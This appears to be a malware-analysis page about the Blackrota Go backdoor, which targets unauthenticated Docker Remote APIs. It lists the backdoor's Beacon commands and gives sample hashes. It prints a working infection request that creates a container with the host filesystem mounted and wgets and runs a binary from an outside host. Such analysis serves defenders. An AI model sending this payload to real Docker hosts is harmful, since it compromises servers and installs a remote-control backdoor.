Blackrota is a backdoor written in go lang and targets Docker containers. It attempts to exploit an unauthorized-access vulnerability in the Docker Remote API. This malware is currently only available for Linux, in ELF file format, and supports both x86/x86-64 CPU architectures. Blackrota is configured and compiled based on geacon, a CobaltStrike Beacon implemented in the Go language, which can be used as a CobalStrike Beacon that interacts with CobaltStrike to control compromised hosts. However it only implements a subset of the beacon function like CMD_SHELL: Execute Shell command, CMD_UPLOAD: Upload files, CMDDOWNLOAD: Download the specified file, CMD_FILE_BROWSE: File browsing, CMD_CD: Change directory, CMD_SLEEP: Set the sleep delay time, CMD_PWD: Return current directory and CMD_EXIT: Exit.
Blackrota Infection
The author of Blackrato recruits multiple payloads for unauthorized use
of the Docker Remote API. A typical payload is simplified as follows:
POST /v1.37/containers/create HTTP/1.1
Host: {target_host}:{target_port}
User-Agent: Docker-Client/19.03.7 (linux)
Content-Length: 1687
Content-Type: application/json
{"Env":[],"Cmd":["/bin/sh","-c","rm ./64 ; wget https://semantipublic.s3.[.]com/itau-poc-elastic/64;chmod 777 64; nohup ./64 u003c/dev/null u003e/dev/null 2u003eu00261 u0026"],"Image":"alpine","Volumes":{},"WorkingDir":"","HostConfig":{"Binds":["/:/mnt"]}
Blackrota Linux Malware Signatures
MD5: 6e020db51665614f4a2fd84fb0f83778
SHA256: a6fdc85b5406097edf795f6a9dcea8ecb85095cfc17cc970a5d80764b052c363
Blackrota Linux Malware Download